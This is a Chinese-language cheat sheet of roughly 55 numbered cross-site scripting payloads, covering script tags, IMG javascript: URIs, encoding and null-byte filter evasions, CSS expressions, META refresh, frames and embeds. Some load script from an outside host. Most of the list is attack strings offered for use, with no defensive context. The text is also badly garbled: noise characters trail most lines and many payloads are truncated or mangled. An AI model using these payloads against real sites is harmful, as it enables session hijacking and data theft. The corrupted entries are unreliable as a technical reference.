(1)普通的XSS JavaScript注入, A: N' h9 R8 c- Y1 K
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% ?8 @; ^. r* z6 D5 Y2 I(99)另类弹框$ q. [- L/ Z/ _* u/ q* V
<q/oncut=alert()>19 T$ C$ L( Y0 K& r, }; s
<s/onclick=alert()>b
7 E+ T4 {1 u3 x+ s) h% m' q <XSS=" onclick="alert(1)//">clickme</SSX=">$ C5 n9 _: [+ I$ P4 G
<zzz onclick=alert`1`>clickme</zzz>
$ a3 f$ W2 j& | P& D% \4 z <a onclick=alert`1`>clickme</a>. N( I6 ], ?/ ]1 ?; G- |# H& z
<a=">clickme</a=">
& x9 U5 l$ N+ U7 \- O6 {<a=">clickme</a>
1 M. N6 M. c/ f+ p: W* w7 G<z=">clickme</z=">
# a5 w/ ?+ Y" K0 U1 s" g<z onclick=alert`1`>clickme</z>
" Z6 d- L& R" x, K3 p3 z1 s1 {7 Z, I( u q
(2)IMG标签XSS使用JavaScript命令- u% {$ o) {0 l2 q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ i* D$ N& z0 X3 J
7 D$ u8 y8 O' K1 ~! G- Q(3)IMG标签无分号无引号; P9 c1 y7 Q# T" m7 W
<IMG SRC=javascript:alert(‘XSS’)>
6 g" `- @" M. {6 p
2 [9 o! G$ ?: ]& M3 i- \(4)IMG标签大小写不敏感+ p2 ~$ y0 y' h( Z$ y5 L
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
5 \$ b$ F7 {/ r+ i& k
+ N9 l4 W u( G7 t) D& L(5)HTML编码(必须有分号)0 g4 y! D6 Y1 w$ B
<IMG SRC=javascript:alert(“XSS”)>
+ }! ^1 i9 I; S! U |& d( ]
3 s! [; q2 y8 @0 K4 K E& J(6)修正缺陷IMG标签" i) G6 N0 U8 [3 L/ X( T
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ u C* f1 |3 ?0 d5 X: }/ }, H* h: M$ i* Z' d
(7)formCharCode标签(计算器)
, [6 i# H' M5 N/ o<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>4 j% ]7 t, ?* a% F; ?5 b$ F
6 \' ]7 s& r7 ]3 R
(8)UTF-8的Unicode编码(计算器)
% C% r8 U* D" H/ [2 }<IMG SRC=jav..省略..S')>8 v8 D$ z+ u! D4 y. D' \. u8 Z
. w& A3 {! ]/ C4 L# @. O(9)7位的UTF-8的Unicode编码是没有分号的(计算器)0 r0 Y" L6 D' x. E- e) a
<IMG SRC=jav..省略..S')>
6 _6 w) a; \( D1 a4 Z( d! a& y) E1 R9 u! q5 J) D
(10)十六进制编码也是没有分号(计算器)
% X* o) D7 c: v7 K<IMG SRC=\'#\'" /span>
( w; C4 o6 o- U" D, \: f3 v8 n
% y3 l8 l5 i8 O; U3 w3 [(11)嵌入式标签,将Javascript分开, C2 |1 L( Y0 ~; U' R
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
9 Q$ `4 c& L& p% W
- s7 Q3 T/ d4 b# A(12)嵌入式编码标签,将Javascript分开. h7 M# h! m7 B
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>: K5 m- n$ U, V# f$ O( [9 ?9 n1 k6 ]
! T. `3 b( a& x: W5 d7 H
(13)嵌入式换行符
' g1 h4 C& o+ ]/ D7 [<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
- O k: P9 J# t6 r
7 o o, H+ v- H3 m0 g(14)嵌入式回车0 q' Y1 b) ]+ [- l
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 \3 _& Z S3 I; O8 S0 ^5 G2 ^& O, O! E+ M) i
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
0 e, P- V) K# v* {2 z( n6 w$ s<IMG SRC=\'#\'" /span>9 O: X7 `) d. W1 o6 T i8 f" v
8 c% e$ g* `4 |3 I0 u3 j9 |(16)解决限制字符(要求同页面)8 o$ h0 p; X8 @- ^
<script>z=’document.’</script> }9 H2 q; o. c* V
<script>z=z+’write(“‘</script>
9 k3 ]6 |& Z, @/ |9 I. U. Q<script>z=z+’<script’</script>
0 j/ S$ H0 E" i<script>z=z+’ src=ht’</script>
( G# J3 n% R. b$ m& f* p<script>z=z+’tp://ww’</script>
, C; r7 O/ m4 V9 C+ v% S<script>z=z+’w.shell’</script>
1 M5 H3 C) O- u. M<script>z=z+’.net/1.’</script>
6 i1 m' k; A3 Z2 q2 }6 I<script>z=z+’js></sc’</script># Z1 S! [. y2 Y% C- ]" Q+ `" \/ F
<script>z=z+’ript>”)’</script>
! n/ s6 x# f& {" K* ^<script>eval_r(z)</script>
: ^( I/ f) H* ?3 t( A/ w4 {- O
& L0 \1 W" {$ c(17)空字符
# f0 x& G' n, W; u6 a% lperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out& I; T/ q3 R; V
9 H* S: e4 i) {2 X7 }% z2 i
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
( V3 q. v' Y( F B6 X. _perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out1 p3 K: X8 P: E% H
2 i0 s2 ]4 p# N* N9 [7 J7 S
(19)Spaces和meta前的IMG标签! I. C' g* x- D: i+ Z
<IMG SRC=\'#\'" javascript:alert(‘XSS’);”>
/ e0 \, H5 Q. y) Q. ]
) Z i7 z* S. o5 X7 @% |(20)Non-alpha-non-digit XSS
3 m' y9 {& O7 w4 B0 @6 Q0 _<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
% T" Z* j; F* ]0 P( }
6 }6 |$ O# m3 v; I" s5 y. `' Z(21)Non-alpha-non-digit XSS to 2
! c0 ^2 d! O! Y% M& h$ D; ?<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>) J& v1 K' ], N& i. Q; w: u
8 m% V3 o8 q' i4 G
(22)Non-alpha-non-digit XSS to 3
# ] d! R2 g: i( w/ q' d" o<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>2 U6 \; }- e( b5 a" T B
( O% x) ~9 y* G4 `(23)双开括号
) G- @- G& \2 N; @' e<<SCRIPT>alert(“XSS”);//<</SCRIPT>; e! d5 E2 z9 A5 `! d
" ?. i4 M4 l8 I, m" q1 E(24)无结束脚本标记(仅火狐等浏览器)! m3 ]; X* b; E; `5 ^( U1 K8 r
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>3 G) ~! A" `7 i& |4 X
3 b) ^5 R+ X1 b6 c9 }/ g! G
(25)无结束脚本标记2
/ W. y5 X! Y+ c. v! p3 o, w3 h% a<SCRIPT SRC=//3w.org/XSS/xss.js>
, J4 a/ f6 o, i, V) I# ^4 }, Y
6 d7 e, u, @' H(26)半开的HTML/JavaScript XSS4 {" x# z: e* N) j
<IMG SRC=\'#\'" /span>
6 \. r' Z8 N. \; V) J0 h2 X
" ?; G' G. s" G(27)双开角括号% T! H8 a1 u8 y! F( l
<iframe src=http://3w.org/XSS.html <
4 I1 `9 T+ s1 ?3 c0 N9 q' i4 T) e% M C9 z1 F, Q2 V
(28)无单引号 双引号 分号0 Y4 v# H; M; P. u. ~
<SCRIPT>a=/XSS/+ L+ H, H- M( p7 z3 o/ B4 X
alert(a.source)</SCRIPT>
7 G; t6 k( n" a9 l) P% ^8 z E; J I; e# n
(29)换码过滤的JavaScript
4 j, l- z9 A! S\”;alert(‘XSS’);//# w$ a; `" m5 \: ^5 G- b$ W4 ^6 f/ p
& b" s# D0 u8 @; `1 {1 n8 C8 F
(30)结束Title标签' h0 f) B4 y: w. y1 `
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>/ j# p' v- B8 w$ e' T" @6 r/ A9 v
9 F3 D4 L% F- z! M
(31)Input Image5 R8 `& z6 z$ S) H) l& Q
<INPUT SRC=\'#\'" /span>
; r8 T3 v3 A( n# v. x
, a9 q8 O& X: M- p(32)BODY Image
* T) w4 n; O& y, q1 m<BODY BACKGROUND=”javascript:alert(‘XSS’)”>0 X7 \: @: U) @ W! V- u
A. B! I L7 i0 K- \0 W(33)BODY标签
7 L& ^9 g9 T1 h0 g, F" b% h<BODY(‘XSS’)>6 w6 C8 C- ~' a
3 o! a5 }7 Z0 i5 i
(34)IMG Dynsrc4 x( p9 T) ]8 w5 ^
<IMG DYNSRC=\'#\'" /span>
3 t- w( z* Y3 L
1 m5 u+ g/ D) G* p+ u(35)IMG Lowsrc
3 {8 C+ k+ C2 A<IMG LOWSRC=\'#\'" /span>5 N1 e4 b0 m$ D4 A8 j
' B/ Z2 s5 d, T( _, g(36)BGSOUND
8 x7 ?8 ]. K' k; ~" u3 I+ [<BGSOUND SRC=\'#\'" /span>
( O* S. W. f( k6 M) ~4 w3 G- b r1 B+ T( i/ _
(37)STYLE sheet
2 [" Y2 u& M, y, G3 X# y<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
2 p% J& {: X. @/ c+ s
' v! Z6 l0 C: E m h(38)远程样式表
& D. S" h+ \, A j<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
: [! V' l2 L K3 v
& e* @# N1 ]5 O8 a6 V- b(39)List-style-image(列表式); ~% _2 W6 f: i; F( p3 a6 O6 Q
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS) J. {3 q2 O5 D: F
$ r& j" m0 v1 J
(40)IMG VBscript
: X. D$ b( `" e* O, a<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
9 y8 K$ s1 Z& f; l
; [& ?3 ^6 E- H7 }(41)META链接url
! r& Q9 c2 N( [8 y<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
5 Y6 ]0 G, m9 r& O; x5 r5 q& v
0 H2 I1 g& y- I: N( P \5 @(42)Iframe
0 S( i% T7 U* T8 e& @<IFRAME SRC=\'#\'" /IFRAME>, k# @$ L3 f' x6 k& D# d
' e( X( Q& _% W4 Z
(43)Frame5 s; Y1 _! ?/ O- o
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
, V9 Q. G& A9 v2 ~$ c9 r7 N: Q. A& f" b) K8 q& w
(44)Table0 G6 L. f E3 a$ N+ Y- k
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
' [2 k1 E5 J u' q1 N1 J# L$ G e8 M
(45)TD
- I1 E& J7 i N<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
. v# l+ n- H& u* @0 k( X! I$ i. S: x% l
(46)DIV background-image( k, |2 H+ d4 L8 I0 Z9 R0 T
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>* k0 k( r( F; H- a% S: D+ L3 d
# j: Z% E3 \' m: ~6 V
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
, f; Y* I, V2 ~" }! K$ [; Z<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>9 b' G \! R: x* v
@8 H) m) D3 X1 x(48)DIV expression
8 V" k& H* ?: P o<DIV STYLE=”width: expression_r(alert(‘XSS’));”>) z$ |; d5 B7 A1 ]% E1 I e4 i3 a% S
# A4 ^/ f/ o) r(49)STYLE属性分拆表达! K/ h2 b. b2 C9 v! _# ^
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>( x7 E5 D0 Z6 [# h# \$ Q @
) z9 c# T2 o5 D. ~$ e2 B% A# c(50)匿名STYLE(组成:开角号和一个字母开头)
9 a2 X- c! @7 U) D& y2 W: B( b( r<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
% s6 p$ R$ O9 V4 N: d% Q" K
: n4 z( ^) C! d: t(51)STYLE background-image6 u" K8 e/ w7 N2 h9 L
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
# j) A, E( M; A4 Q& u$ i. o1 I9 {2 b, B. F* s
(52)IMG STYLE方式
0 b" h7 E9 B6 o9 B, d, Nexppression(alert(“XSS”))’>! `& n5 D4 Y' D7 E8 ~ L* }
. r% M# i4 x0 m" O: y2 g
(53)STYLE background+ Q0 Z3 \6 d1 b. {7 Q( \3 T
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>$ l/ R4 ^" T) `" `! U
- I4 J0 b: f0 m, h+ c
(54)BASE. h, ]# J) p* ^# g$ K/ t
<BASE HREF=”javascript:alert(‘XSS’);//”>
1 O* L1 k* h( m6 b
8 i1 [+ S$ q& h/ R4 X8 b q! a(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
* A. M1 w3 T9 J. z, q5 S& C<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>" e' b) S. c: }8 G9 {0 Q
|